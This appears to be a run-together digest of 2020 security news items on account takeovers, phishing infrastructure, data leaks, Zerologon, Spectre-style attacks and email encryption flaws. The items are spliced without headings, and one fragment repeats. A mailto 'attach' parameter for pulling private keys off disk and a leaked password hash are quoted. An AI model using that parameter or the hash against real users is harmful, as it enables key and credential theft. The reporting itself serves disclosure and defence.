Grindr, one of the world’s largest dating and social networking apps for gay, bi, trans, and queer people, has fixed a security vulnerability that allowed anyone to hijack and take control of any user’s account using only their email address.
Wassime Bouimadaghene, a French security researcher, found the vulnerability and reported the issue to Grindr. When he didn’t hear back, Bouimadaghene shared details of the vulnerability with security expert Troy Hunt to help.
The vulnerability was fixed a short time later.
Hunt tested and confirmed the vulnerability with help from a test account set up by Scott Helme, and shared his findings with TechCrunch.
Bouimadaghene found the vulnerability in how the app handles account password resets.
To reset a password, Grindr sends the user an email with a clickable link containing an account password reset token. Once clicked, the user can change their password and is allowed back into their account.
But Bouimadaghene found that Grindr’s password reset page was leaking password reset tokens to the browser. That meant anyone could trigger the password reset who had knowledge of a user’s registered email address, and collect the password reset token from the browser if they knew where to look.
Secret tokens used to reset Grindr account passwords, which are only supposed to be sent to a user’s inbox, were leaking to the browser. (Image: Troy Hunt/supplied)
The clickable link that Grindr generates for a password reset is formatted the same way, meaning a malicious user could easily craft their own clickable password reset link — the same link that was sent to the user’s inbox — using the leaked password reset token from the browser.
With that crafted link, the malicious user can reset the account owner’s password and gain access to their account and the personal data stored within, including account photos, messages, sexual orientation and HIV status and last test date.
“This is one of the most basic account takeover techniques I’ve seen,” Hunt wrote.
A newly discovered technique by a researcher shows how Google’s App Engine domains can be abused to deliver phishing and malware while remaining undetected by leading enterprise security products.
Google App Engine is a cloud-based service platform for developing and hosting web apps on Google’s servers.
While reports of phishing campaigns leveraging enterprise cloud domains are nothing new, what makes Google App Engine infrastructure risky in how the subdomains get generated and paths are routed.
Practically unlimited subdomains for one app
Typically scammers use cloud services to create a malicious app that gets assigned a subdomain. They then host phishing pages there. Or they may use the app as a command-and-control (C2) server to deliver malware payload.
But the URL structures are usually generated in a manner that makes them easy to monitor and block using enterprise security products, should there be a need.
For example, a malicious app hosted on Microsoft Azure services may have a URL structure like: https://example-subdomain.app123.web.core.windows.net/…
Therefore, a cybersecurity professional could block traffic to and from this particular app by simply blocking requests to and from this subdomain. This wouldn’t prevent communication with the rest of the Microsoft Azure apps that use other subdomains.
It gets a bit more complicated, however, in the case of Google App Engine.
Security researcher Marcel Afrahim demonstrated an intended design of Google App Engine’s subdomain generator, which can be abused to use the app infrastructure for malicious purposes, all while remaining undetected.
Google’s appspot.com domain, which hosts apps, has the following URL structure:
A subdomain, in this case, does not only represent an app, it represents an app’s version, the service name, project ID, and region ID fields.
But the most important point to note here is, if any of those fields are incorrect, Google App Engine won’t show a 404 Not Found page, but instead show the app’s “default” page (a concept referred to as soft routing).
“Requests are received by any version that is configured for traffic in the targeted service. If the service that you are targeting does not exist, the request gets Soft Routed,” states Afrahim, adding:
“If a request matches the PROJECT_ID.REGION_ID.r.appspot.com portion of the hostname, but includes a service, version, or instance name that does not exist, then the request is routed to the default service, which is essentially your default hostname of the app.”
Essentially, this means there are a lot of permutations of subdomains to get to the attacker’s malicious app. As long as every subdomain has a valid “project_ID” field, invalid variations of other fields can be used at the attacker’s discretion to generate a long list of subdomains, which all lead to the same app.
For example, as shown by Afrahim, both URLs below – which look drastically different, represent the same app hosted on Google App Engine.
“Verified by Google Trust Services” means trusted by everyone
The fact that a single malicious app is now represented by multiple permutations of its subdomains makes it hard for sysadmins and security professionals to block malicious activity.
But further, to a technologically unsavvy user, all of these subdomains would appear to be a “secure site.” After all, the appspot.com domain and all its subdomains come with the seal of “Google Trust Services” in their SSL certificates.
Google App Engine sites showing valid SSL certificate with “Verified by: Google Trust Services” text
Source: Afrahim
Even further, most enterprise security solutions such as Symantec WebPulse web filter automatically allow traffic to trusted category sites. And Google’s appspot.com domain, due to its reputation and legitimate corporate use cases, earns an “Office/Business Applications” tag, skipping the scrutiny of web proxies.
Automatically trusted by most enterprise security solutions
On top, a large number of subdomain variations renders the blocking approach based on Indicators of Compromise (IOCs) useless.
A screenshot of a test app created by Afrahim along with a detailed “how-to” demonstrates this behavior in action.
In the past, Cloudflare domain generation had a similar design flaw that Astaroth malware would exploit via the following command wheen fetching stage 2 payload:
This would essentially launch a Windows command prompt and put a random number replacing %RANDOM% making the payload URL truly dynamic.
“And now you have a script that downloads the payload from different URL hostnames each time is run and would render the network IOC of such hypothetical sample absolutely useless. The solutions that rely on single run on a sandbox to obtain automated IOC would therefore get a new Network IOC and potentially new file IOC if script is modified just a bit,” said the researcher.
Delivering malware via Google App Engine subdomain variations while bypassing IOC blocks
Actively exploited for phishing attacks
Security engineer and pentester Yusuke Osumi tweeted last week how a Microsoft phishing page hosted on the appspot.com subdomain was exploiting the design flaw Afrahim has detailed.
Osumi additionally compiled a list of over 2,000 subdomains generated dynamically by the phishing app—all of them leading to the same phishing page.
Active exploitation of Google App Engine subdomains in phishing attacks
Source: Twitter
This recent example has shifted the focus of discussion from how Google App Engine’s flaw can be potentially exploited to active phishing campaigns leveraging the design flaw in the wild.
“Use a Google Drive/Service phishing kit on Google’s App Engine and normal user would not just realize it is not Google which is asking for credentials,” concluded Afrahim in his blog post.
Twitter is notifying developers today about a possible security incident that may have impacted their accounts.
The incident was caused by incorrect instructions that the developer.twitter.com website sent to users’ browsers.
The developer.twitter.com website is the portal where developers manage their Twitter apps and attached API keys, but also the access token and secret key for their Twitter account.
In an email sent to developers today, Twitter said that its developer.twitter.com website told browsers to create and store copies of the API keys, account access token, and account secret inside their cache, a section of the browser where data is saved to speed up the process of loading the page when the user accessed the same site again.
This might not be a problem for developers using their own browsers, but Twitter is warning developers who may have used public or shared computers to access the developer.twitter.com website — in which case, their API keys are now most likely stored in those browsers.
“If someone who used the same computer after you in that temporary timeframe knew how to access a browser’s cache, and knew what to look for, it is possible they could have accessed the keys and tokens that you viewed,” Twitter said.
“Depending on what pages you visited and what information you looked at, this could have included your app’s consumer API keys, as well as the user access token and secret for your own Twitter account,” Twitter said.
Netgear has decided that users of some of its managed network switches don’t need access to the equipment’s full user interface – unless they register their details with Netgear first.
For instance, owners of its 64W Power-over-Ethernet eight-port managed gigabit switch GC108P, and its 126W variant GC108PP, need to hand over information about themselves to the Netgear Cloud to get full use out of the devices.
“Starting from firmware version 1.0.5.4, product registration is required to unlock full access to the local browser user interface,” said the manufacturer in a note on its website referencing a version released in April this year.
The latest build, 1.0.5.8, released last week, continues that registration requirement. These rules also appear to apply to a dozen or so models of Netgear’s kit, including its GS724TPP 24-port managed Ethernet switch.
“I recently bought a couple of Netgear Managed Switches for business, and in their datasheet they list local-only management as a feature. Only after they arrived we discovered that you only get limited functionality in the local-only management mode, you have to register the switches to your Netgear Cloud account to get access to the full functionality,” fumed one netizen on a Hacker News discussion thread. “I would not have bought the switches if I had knew I needed to register them to Netgear Cloud to have access to the full functionality specified in the data sheet.”
It appears the Silicon Valley giant is aware that not everyone will rush to create a cloud account to manage their network hardware because it has published a list of functions that one can freely access without said registration – for now, anyway.
We’ve asked Netgear to explain the move. The manufacturer most recently made the headlines when, after being informed of a security flaw in a large number of product lines, promptly abandoned half of them rather than issue a patch.
Professor Alan Woodward of the University of Surrey, England, opined: “It’s a conundrum because it is software and you do have only a licence to use it: you don’t own it so one might argue this helps protect intellectual property rights. However, that’s different for the hardware which is pretty useless without the software.”
Woodward pointed to Netgear’s online privacy policy, which, like every other company on the internet, states that data from customers and others can be hoovered up for marketing purposes, research and so on (see section 11).
Microsoft has released Sysmon 12, and it comes with a useful feature that logs and captures any data added to the Windows Clipboard.
This feature can help system administrators and incident responders track the activities of malicious actors who compromised a system.
Those not familiar with Sysmon, otherwise known as System Monitor, it is a Sysinternals tool that monitors Windows systems for malicious activity and logs it to the Windows event log.
Sysmon 12 adds clipboard capturing
With the release of Sysmon 12, users can now configure the utility to generate an event every time data is copied to the Clipboard. The Clipboard data is also saved to files that are only accessible to an administrator for later examination.
As most attackers will utilize the Clipboard when copying and pasting long commands, monitoring the data stored in the Clipboard can provide useful insight into how an attack was conducted.
Once downloaded, run it from an elevated command prompt, as it needs administrative privileges to run.
Simply running Sysmon.exe without any arguments will display a help screen, and for more detailed information, you can go to the Sysinternals’ Sysmon page.
Sysmon 12 help
Without any configuration, Sysmon will monitor basic events such as process creation and file time changes.
It is possible to configure it to log many other types of information by creating a Sysmon configuration file, which we will do to enable the new ‘CaptureClipboard’ directive.
For a very basic setup that will enable Clipboard logging and capturing, you can use the configuration file below:
Configuration file enabling the CaptureClipboard feature
To start Sysmon and direct it to use the above configuration file, you would enter the following command from an elevated command prompt:
sysmon -i sysmon.cfg.xml
Once started, Sysmon will install its driver and begin collecting data quietly in the background.
All Sysmon events will be logged to ‘Applications and Services Logs/Microsoft/Windows/Sysmon/Operational‘ in the Event Viewer.
With the CaptureClipboard feature enabled, when data is copied into the Clipboard it will generate an ‘Event 24 – Clipboard Changed’ entry in Event Viewer, as shown below.
Event 24 – Clipboard Changed
The event log entry will display what process stored the data in the clipboard, the user who copied it, and when it was done. It will not, though, show the actual data that was copied.
The copied data is instead saved to the protected C:\Sysmon C:\Sysmon folder in files named clip-SHA1_HASH, where the hash is provided in the event above.
For example, the event displayed above would have the Clipboard contents stored in the C:\Sysmon\CLIP-CC849193D18FF95761CD8A702B66857F329BE85B file.
This C:\Sysmon folder is protected with a System ACL, and to access it, you need to download the psexec.exe program and launch a cmd prompt with System privileges using the following command:
psexec -sid cmd
After the new System command prompt is launched, you can go into the C:\Sysmon folder to access the saved Clipboard data.
Protected C:\Sysmon folder
When opening the CLIP-CC849193D18FF95761CD8A702B66857F329BE85B file, you can see that it contains a PowerShell command that I copied into the clipboard from Notepad.exe.
Capture Clipboard data
This PowerShell command is used to clear Shadow Volume Copies in Windows, which can be used by an attacker who wants to make it harder to restore deleted data.
Having this information illustrates how useful this feature can be when performing incident response.
Another useful feature added in Sysmon 11 will automatically create backups of deleted files, allowing administrators to recover files used in an attack.
Last month, Microsoft patched a very interesting vulnerability that would allow an attacker with a foothold on your internal network to essentially become Domain Admin with one click. All that is required is for a connection to the Domain Controller to be possible from the attacker’s viewpoint.
Secura’s security expert Tom Tervoort previously discovered a less severe Netlogon vulnerability last year that allowed workstations to be taken over, but the attacker required a Person-in-the-Middle (PitM) position for that to work. Now, he discovered this second, much more severe (CVSS score: 10.0) vulnerability in the protocol. By forging an authentication token for specific Netlogon functionality, he was able to call a function to set the computer password of the Domain Controller to a known value. After that, the attacker can use this new password to take control over the domain controller and steal credentials of a domain admin.
The vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This flaw allows attackers to impersonate any computer, including the domain controller itself, and execute remote procedure calls on their behalf.
Secura urges everybody to install the patch on all their domain controllers as fast as possible. Please refer to Microsoft’s advisory. We published a test tool on Github, which you can download here: https://github.com/SecuraBV/CVE-2020-1472 that can tell you whether a domain controller is vulnerable or not.
If you are interested in the technical details behind this pretty unique vulnerability and how it was discovered,download the whitepaper here.
In August, security researcher Volodymyr Diachenko discovered a misconfigured Elasticsearch cluster, owned by gaming hardware vendor Razer, exposing customers’ PII (Personal Identifiable Information).
The cluster contained records of customer orders and included information such as item purchased, customer email, customer (physical) address, phone number, and so forth—basically, everything you’d expect to see from a credit card transaction, although not the credit card numbers themselves. The Elasticseach cluster was not only exposed to the public, it was indexed by public search engines.
[…]
One of the things Razer is well-known for—aside from their hardware itself—is requiring a cloud login for just about anything related to that hardware. The company offers a unified configuration program, Synapse, which uses one interface to control all of a user’s Razer gear.
Until last year, Synapse would not function—and users could not configure their Razer gear, for example change mouse resolution or keyboard backlighting—without logging in to a cloud account. Current versions of Synapse allow locally stored profiles for off-Internet use and what the company refers to as “Guest mode” to bypass the cloud login.
Many gamers are annoyed by the insistence on a cloud account for hardware configuration that doesn’t seem to really be enhanced by its presence. Their pique is understandable, because the pervasive cloud functionality comes with cloud vulnerabilities. Over the last year, Razer awarded a single HackerOne user, s3cr3tsdn, 28 separate bounties.
We applaud Razer for offering and paying bug bounties, of course, but it’s difficult to forget that those vulnerabilities wouldn’t have been there (and globally exploitable), if Razer hadn’t tied their device functionality so thoroughly to the cloud in the first place.
The database built by Shenzhen Zhenhua from a variety of sources is technically complex using very advanced language, targeting, and classification tools. Shenzhen Zhenhua claims to work with, and our research supports, Chinese intelligence, military, and security agencies use the open information environment we in open liberal democracies take for granted to target individuals and institutions. Our research broadly support their claims.
The information specifically targets influential individuals and institutions across a variety of industries. From politics to organized crime or technology and academia just to name a few, the database flows from sectors the Chinese state and linked enterprises are known to target.
The breadth of data is also staggering. It compiles information on everyone from key public individuals to low level individuals in an institution to better monitor and understand how to exert influence when needed.
Compiling public and non-public personal and institutional data, Shenzhen Zhenhua has likely broken numerous laws in foreign jurisdictions. Claiming to partner with state intelligence and security services in China, Shenzhen Zhenhua operates collection centers in foreign countries that should be considered for investigation in those jurisdictions.
s that should be considered for investigation in those jurisdictions.
The personal details of millions of people around the world have been swept up in a database compiled by a Chinese tech company with reported links to the country’s military and intelligence networks, according to a trove of leaked data.
About 2.4 million people are included in the database, assembled mostly based on public open-source data such as social media profiles, analysts said. It was compiled by Zhenhua Data, based in the south-eastern Chinese city of Shenzhen.
Internet 2.0, a cybersecurity consultancy based in Canberra whose customers include the US and Australian governments, said it had been able to recover the records of about 250,000 people from the leaked dataset, including about 52,000 Americans, 35,000 Australians and nearly 10,000 Britons. They include politicians, such as prime ministers Boris Johnson and Scott Morrison and their relatives, the royal family, celebrities and military figures.
When contacted by the Guardian for comment, a representative of Zhenhua said: “The report is seriously untrue.”
“Our data are all public data on the internet. We do not collect data. This is just a data integration. Our business model and partners are our trade secrets. There is no database of 2 million people,” said the representative surnamed Sun, who identified herself as head of business.
“We are a private company,” she said, denying any links to the Chinese government or military. “Our customers are research organisations and business groups.”
Three “grumpy old hackers” in the Netherlands managed to access Donald Trump’s Twitter account in 2016 by extracting his password from the 2012 Linkedin hack.
The pseudonymous, middle-aged chaps, named only as Edwin, Mattijs and Victor, told reporters they had lifted Trump’s particulars from a database that was being passed about hackers, and tried it on his account.
To their considerable surprise, the password – but not the email address associated with @realdonaldtrump – worked the first time they tried it, with Twitter’s login process confirming the password was correct.
The explosive allegations were made by Vrij Nederland (VN), a Dutch magazine founded during WWII as part of the Dutch resistance to Nazi German occupation.
“A digital treasure chest with 120 million usernames and hashes of passwords. It was the spoil of a 2012 digital break-in,” wrote VN journalist Gerard Janssen, describing the LinkedIn database hack. After the networking website for suits was hacked in 2012 by a Russian miscreant, the database found its way onto the public internet in 2016 when researchers eagerly pored over the hashes. Critically, the leaked database included 6.5 million hashed but unsalted passwords.
Poring through the database, the trio found an entry for Trump as well as the hash for Trump’s password: 07b8938319c267dcdb501665220204bbde87bf1d. Using John the Ripper, a hash-reversing tool, they were able to uncover one of the Orange One’s login credentials. Some considerable searching revealed the correct email address (twitter@donaldjtrump.com – a different one from the one Trump used on LinkedIn and which was revealed in the hack)… only for the “middle aged” hackers to be defeated by Twitter detecting that the man who would become the 45th president of the United States had logged in earlier from New York.
One open proxy server later, they were in.
VN published screenshots supplied by the three showing a browser seemingly logged into Trump’s Twitter account, displaying a tweet dating from 27 October 2016 referring to a speech Trump delivered in Charlotte, North Carolina, USA.
Despite trying to alert American authorities to just how insecure Trump’s account was (no multi-factor authentication, recycled password from an earlier breach) the hackers’ efforts got nowhere, until in desperation they tried Netherland’s National Cyber Security Centrum – which acknowledged receipt of their prepared breach report, which the increasingly concerned men had prepared immediately once they realised their digital trail was not particularly well covered.
“In short, the grumpy old hackers must set a good example. And to do it properly with someone they ‘may not really like’ they think this is a good example of a responsible disclosure, the unsolicited reporting of a security risk,” concluded VN’s Janssen.
Professor Alan Woodward of the University of Surrey added: “It’s password hygiene 101: use a different password for each account. And, if you know a password has been compromised in a previous breach (I think LinkedIn is well known) then for goodness sake, don’t use that one. [This is] a textbook example of credential stuffing.”
Boffins in America, the Netherlands, and Switzerland have devised a Spectre-style attack on modern processors that can defeat defenses that are supposed to stop malicious software from hijacking a computer’s operating system. The end result is exploit code able to bypass a crucial protection mechanism and take over a device to hand over root access.
That’s a lot to unpack so we’ll start from the top. Let’s say you find a security vulnerability, such as a buffer overflow, in the kernel of an OS like Linux. Your aim is to use this programming flaw to execute code within the kernel so that you can take over the whole machine or device. One way to do this, and sidestep things like stack cookies and the prevention of data execution, is to use return-orientated programming (ROP). This involves chaining together snippets of instruction sequences in the kernel to form an ad-hoc program that does whatever you want: hand control of the machine to you, for example.
To thwart ROP-based exploits, a defense called Address Space Layout Randomization (ASLR) was devised some years back that, as the name suggests, randomizes the locations of an application or operating system kernel’s code and libraries in memory. That makes it difficult to write working ROP exploits as the snippets of code they need aren’t in their expected locations; they are randomly placed during boot. Some information needs to be leaked from the kernel that reveals the current layout of its components in RAM. If a ROP exploit just guesses the kernel’s layout and is wrong, it will trigger a crash, and this can be detected and acted on by an administrator.
Enter Spectre. This is the family of vulnerabilities that can be exploited by malware or a rogue user to obtain secret, privileged information – such as passwords and keys – by taking advantage of speculative execution, which is when a processor performs an operation before it’s needed and either retains or tosses the result, depending on the processor instructions ultimately executed.
What the team say they’ve done is designed a Spectre-style technique that can silently speculatively probe memory to determine the location of the kernel’s parts without triggering a crash. And that makes a blind return-oriented programming (BROP) attack possible, bypassing any ASLR in the way.
Hijack merchant
The technique, dubbed BlindSide, is explained in a paper [PDF] by Enes Göktaş and Georgios Portokalidis (Stevens Institute of Technology), Herbert Bos and Cristiano Giuffrida (Vrije Universiteit Amsterdam), and Kaveh Razavi (ETH Zürich). Scheduled to be presented at the ACM Conference on Computer and Communications Security (CCS) 2020, it involves memory-corruption-based speculative control-flow hijacking.
“Using speculative execution for crash suppression allows the elevation of basic memory write vulnerabilities into powerful speculative probing primitives that leak through microarchitectural side effects,” the paper stated. “Such primitives can repeatedly probe victim memory and break strong randomization schemes without crashes and bypass all deployed mitigations against Spectre-like attacks.”
The basic memory write vulnerability in this case was a heap buffer overflow patched some time ago in the Linux kernel (CVE-2017-7308). But the boffins insist other vulnerabilities that provide access to a write primitive, such as CVE-2017-1000112, CVE-2017-7294, and CVE-2018-5332, would work too. So to be clear: you need to find an unpatched hole in the kernel, get some kind of code execution on the machine in question, and then deploy the BROP technique with an exploit to gain root privileges.
The boffins show that they can break KASLR (Kernel ASLR) to run an ROP exploit; leak the root password hash; and undo fine-grained randomization (FGR) and kernel execute-only memory (XoM) protections to access the entire kernel text and perform an ROP exploit.
A video of one such attack shows that the technique takes a few minutes, but does manage to elevate the user to root privileges:
The computer scientists confirmed their technique on Linux kernel version 4.8.0 compiled with gcc and all mitigations enabled on a machine with an Intel Xeon E3-1270 v6 processor clocked at 3.80GHz with 16GB of RAM.
They also did so on Linux kernel version 5.3.0-40-generic with all the mitigations (e.g., Retpoline) enabled on an Intel i7-8565U chip (Whiskey Lake) with the microcode update for the IBPB, IBRS and STIBP mitigations. What’s more, the technique worked on Intel Xeon E3-1505M v5, Xeon E3-1270 v6 and Core i9-9900K CPUs (Skylake, Kaby Lake, and Coffee Lake) and on AMD Ryzen 7 2700X and Ryzen 7 3700X CPUs (Zen+ and Zen2).
“Overall, our results confirm speculative probing is effective on a modern Linux system on different microarchitectures, hardened with the latest mitigations,” the paper stated.
Potential mitigations involve preventing, detecting, and hindering speculative probing, but none of these approaches, the authors suggest, can deal with the issue very well. Intel and AMD did not immediately respond to requests for comment.
Windows 10 users can customize their desktops with unique themes, and are able to create and share those themes with others. Hackers can also use them to steal your credentials.
A flaw in Windows 10’s theme-creation feature lets hackers modify custom themes that, once installed, trick users into passing over their Microsoft account name and password data via counterfeit login pages. This technique wouldn’t necessarily raise any red flags for an average person, as some legit Windows 10 themes have you sign in after installation.
This “Pass the Hash” attack doesn’t steal your password verbatim, but rather the password hash—a jumbled up and obfuscated version of your password’s data. Companies hash password data to keep it more secure when stored on remote servers, but hackers can unscramble passwords with readily available software. In some cases, passwords can be cracked in just a few seconds.
This vulnerability was discovered by cybersecurity researcher Jimmy Bayne, who publicly disclosed the findings in a Twitter thread.
Bayne alerted Microsoft to the security risk, but the company says it has no plans to change the Theme feature since the credential passing is an intended feature; Hackers have simply found a way to use it maliciously.
With no official action being taken, it’s up to users to keep themselves safe from shady Windows 10 themes.
BleepingComputer and Bayne outline options for enterprise versions of Windows 10, but these won’t work for general users. The smartest move is to avoid custom themes entirely, but if you keep using them, make sure you’re only downloading official themes from secure sources like the Windows Store.
Whether you keep using custom themes or not, you should also update your accounts with unique passwords, turn on two-factor authentication, and use an encrypted password manager. I would also suggest unlinking third-party accounts from your Microsoft account and using local user accounts to sign in to your PC, rather than your Microsoft Account. Protective steps like these make it harder for outsiders to steal your data, even if they happen to snag a password.
The coronavirus pandemic has forced people around the globe to temporarily modify the ways they go about activities. Activities like these include political elections and campaigning.
Since the virus hit in an election year, it’s highly likely new measures will be taken to prevent mass gatherings during voting. Infection rates aren’t likely to drop any time soon, and even if they did, queues for voting could lead to huge bursts of cases everywhere. At least 15 states in the US postponed presidential election primaries.
Suggestions have been made by election administrators to utilize an analog method of voting known as mail voting. It involves the mailing in of ballots by voters. If this technique is used, it would be highly likely that the results of the election would be decided in weeks or months.
Because of the pandemic, new voter registrations have dropped tremendously, with a 70% decrease experienced in twelve states. This year’s election was expected to break previous voting turnout records. However, with lockdowns still in place, voting participation will seemingly be reduced.
There have also been calls for online voting in some states like New Jersey, Delaware, and West Virginia. Currently, election administrators are holding discussions on the best method to use that would combine voting efficiency, safe health practices, and a speedy turnout of results.
Omnibox – Security Vulnerabilities
The most viable method which has been touted by speculators is the use of Omnibox – an online-based voting and ballot system primarily for the disabled, military and overseas voters. This system has however come under scrutiny from several quarters regarding its credibility.
In a paper released by Michael Specter and J. Alex Halderman, researchers at Massachusetts Institute of Technology (MIT) and the University of Michigan, they highlighted several security vulnerabilities inherent in the system and labelled it insecure on so many levels. Their study was based on three main branches of the system namely:
Online Ballot Return: One of these issues stemmed from the fact that the system was reliant on several third-party services which could deliver altered results, robbing the system of its independence and reliability. The risks associated with online ballot return are considered grave and can be influenced by malware and database compromise.
Blank Ballot Delivery: Although considered a moderate risk since rigorous electoral screening can check this, blank ballot delivery is still regarded as a risk. The system runs the risk of having voters’ ballots returned as blank or some candidates omitted from the ballot box.
Online Ballot Marking Manipulation: Here, attackers discover the voters’ choices and then either alter them or get their votes scanned in a different candidate’s box. This is tagged as high-risk vulnerability and ultimately, one of the reasons why this system is not recommended for use.
Mitigating Online Risks when “going to the polls”
Despite these vulnerabilities which seem like they should be handled by the government – which ordinarily should be, below are ways by which voters themselves can protect their votes from alteration.
Use Encryption Software: Encryption software helps add an extra layer of security to the data being sent over the Internet. Many times, public WiFis which we all make use of, have malicious elements waiting somewhere on the network to steal user data. To mitigate against this risk, download and use a VPN app when connecting to an unsure network in order to prevent data theft or alteration.
Educate Yourself: The government often releases guidelines on best practices to apply when making use of the online voting system. Engage in voter education and also educate people around you. For example, make sure you enter the official voting website, instead of any unapproved system that was established to mislead voters.
Use Antivirus Software: Viruses and malwares are one of the many ways by which cyber criminals also perpetuate their acts when it comes to online voting. Getting one of the best antivirus software on the Internet can help detect, scan and remove any suspicious or corrupted program that might be existing on the system.
The United States Court of Appeals for the Ninth Circuit has ruled [PDF] that the National Security Agency’s phone-call slurping was indeed naughty, seven years after former contractor Edward Snowden blew the whistle on the tawdry affair.
It’s been a long time coming, and while some might view the decision as a slap for officials that defended the practice, the three-judge panel said the part played by the NSA programme wasn’t sufficient to undermine the convictions of four individuals for conspiring to send funds to Somalia in support of a terrorist group.
Snowden made public the existence of the NSA data collection programmes in June 2013, and by June 2015 US Congress had passed the USA FREEDOM Act, “which effectively ended the NSA’s bulk telephony metadata collection program,” according to the panel.
The panel took a long, hard look at the metadata collection programme, which slurped the telephony of millions of Americans (as well as at least one of the defendants) and concluded that not only had the Fourth Amendment of the constitution likely been violated, it certainly flouted section 1861 of the Foreign Intelligence Surveillance Act (FISA), which deals with access to business records in foreign intelligence and international terrorism investigations.
“On the merits,” the ruling said, “the panel held that the metadata collection exceeded the scope of Congress’s authorization in 50 U.S.C. § 1861, which required the government to make a showing of relevance to a particular authorized investigation before collecting the records, and that the program therefore violated that section of FISA.”
So, both illegal and quite possibly unconstitutional.
It isn’t a good look for the intelligence services. The panel was able to study the classified records and noted that “the metadata did not and was not necessary to support the requisite probable cause showing for the FISA Subchapter I warrant application in this case.”
The panel went on to administer a light slapping to those insisting that the metadata programme was an essential element in the case. The evidence, such as it was, “did not taint the evidence introduced by the government at trial,” the panel observed before going on to say: “To the extent the public statements of government officials created a contrary impression, that impression is inconsistent with the contents of the classified record.”
Thus not only illegal, possibly unconstitutional but also not particularly helpful in this instance, no matter what officials might have insisted.
While the American Civil Liberties Union (ACLU) declared the ruling “a victory for our privacy rights”, the process could have a while to run yet, including a trip to America’s Supreme Court
Facebook has published its first Vulnerability Disclosure Policy and given itself grounds to blab the existence of bugs to the world if it thinks that’s the right thing to do.
“Facebook may occasionally find critical security bugs or vulnerabilities in third-party code and systems, including open source software,” the company writes. “When that happens, our priority is to see these issues promptly fixed, while making sure that people impacted are informed so that they can protect themselves by deploying a patch or updating their systems.”
The Social Network™ has made itself the arbiter of what needs to be disclosed and when it needs to be disclosed. The company’s policy is to contact “the appropriate responsible party” and give them 21 days to respond.
“Facebook will evaluate based on our interpretation of the risk to people.”
“If we don’t hear back within 21 days after reporting, Facebook reserves the right to disclose the vulnerability,” the policy says, adding: “If within 90 days after reporting there is no fix or update indicating the issue is being addressed in a reasonable manner, Facebook will disclose the vulnerability.”
But the company has also outlined exceptions to those rules, with acceleration of disclosure if a bug is already being exploited and slowing down news “If a project’s release cycle dictates a longer window.”
The third reason is:
“If a fix is ready and has been validated, but the project owner unnecessarily delays rolling out the fix, we might initiate the disclosure prior to the 90-day deadline when the delay might adversely impact the public.”
Facebook “will evaluate each issue on a case-by-case basis based on our interpretation of the risk to people.”
The policy isn’t wildly difficult from that used by Google’s Project Zero, which also discloses bugs after 90 days and also offers extensions under some circumstances.
Can’t send something on Gmail? If so then you’re in good company, ever since about midnight ET, people have been complaining about issues connecting to many of the G suite services, but especially Gmail.
I’ve been able to send emails, but trying to attach a file shows a slow upload process that, if it completes, eventually leads to an error message saying that I need to check my network. It’s the same thing many others are experiencing, but at least it’s working a little. Oh, and if things weren’t bad enough for remote workers on this shift, it looks like Slack is having some issues too.
Update (2:14 AM ET): Google’s status page says they are continuing to investigate the issue. It has also updated to indicate reports of problems with Google Meet, Google Voice and Google Docs, while anecdotal reports show people are having issues uploading to YouTube as well.
8/20/20, 1:29 AM We’re investigating reports of an issue with Gmail. We will provide more information shortly.
8/20/20, 2:07 AM We are continuing to investigate this issue. We will provide an update by 8/20/20, 4:00 AM detailing when we expect to resolve the problem.
A security researcher has detailed how an artificial intelligence company in possession of nearly 2.6 million medical records allowed them to be publicly visible on the internet. It’s a clear reminder that our personal health data is not safe.
As Secure Thoughts reports, on July 7 security researcher Jeremiah Fowler discovered two folders of medical records available for anyone to access on the internet. The data was labeled as “staging data” and hosted by artificial intelligence company Cense AI, which specializes in “SaaS-based intelligent process automation management solutions.” Fowler believes the data was made public because Cense AI was temporarily hosting it online before loading it into the company’s management system or an AI bot.
The medical records are quite detailed and include names, insurance records, medical diagnosis notes, and payment records. It looks as though the data was sourced from insurance companies and relates to car accident claims and referrals for neck and spine injuries. The majority of the personal information is thought to be for individuals located in New York, with a total of 2,594,261 records exposed.
Boffins testing the security of OpenPGP and S/MIME, two end-to-end encryption schemes for email, recently found multiple vulnerabilities in the way email client software deals with certificates and key exchange mechanisms.
They found that five out of 18 OpenPGP-capable email clients and six out of 18 S/MIME-capable clients are vulnerable to at least one attack.
These flaws are not due to cryptographic weaknesses. Rather they arise from the complexity of email infrastructure, based on dozens of standards documents, as it has evolved over time, and the impact that’s had on the way affected email clients handle certificates and digital signatures.
In a paper [PDF] titled “Mailto: Me Your Secrets. On Bugs and Features in Email End-to-End Encryption,” presented earlier this summer at the virtual IEEE Conference on Communications and Network Security, Jens Müller, Marcus Brinkmann, and Joerg Schwenk (Ruhr University Bochum, Germany) and Damian Poddebniak and Sebastian Schinzel (Münster University of Applied Sciences, Germany) reveal how they were able to conduct key replacement, MITM decryption, and key exfiltration attacks on various email clients.
“We show practical attacks against both encryption schemes in the context of email,” the paper explains.
“First, we present a design flaw in the key update mechanism, allowing a third party to deploy a new key to the communication partners. Second, we show how email clients can be tricked into acting as an oracle for decryption or signing by exploiting their functionality to auto-save drafts. Third, we demonstrate how to exfiltrate the private key, based on proprietary mailto parameters implemented by various email clients.”
This is not the sort of thing anyone trying to communicate securely over email wants because it means encrypted messages may be readable by an attacker and credentials could be stolen.
Müller offers a visual demonstration via Twitter on Tuesday:
Have you ever heard of the mailto:?attach=~/… parameter? It allows to include arbitrary files on disk. So, why break PGP if you can politely ask the victim’s mail client to include the private key? (1/4) pic.twitter.com/7ub9dJZJaO
The research led to CVEs for GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), and IBM/HCL Notes (CVE-2020-4089). There are two more CVEs (CVE-2020-12618, and CVE-2020-12619) that haven’t been made public.
According to Müller, affected vendors were notified of the vulnerabilities in February.
Pegasus Mail is said to be affected though it doesn’t have a designated CVE – it may be that one of the unidentified CVEs applies here.
Thunderbird versions 52 and 60 for Debian/Kali Linux were affected but more recent versions are supposed to be immune since the email client’s developers fixed the applicable flaw last year. It allowed a website to present a link with the "mailto?attach=..." parameter to force Thunderbird to attach local files, like an SSH private key, to an outgoing message.
However, those who have installed the xdg-utils package, a set of utility scripts that provide a way to launch an email application in response to a mailto: link, appear to have reactivated this particular bug, which has yet to be fixed in xdg-utils.
More than 3.7 million. That’s the latest number of surveillance cameras, baby monitors, doorbells with webcams, and other internet-connected devices found left open to hijackers via two insecure communications protocols globally, we’re told.
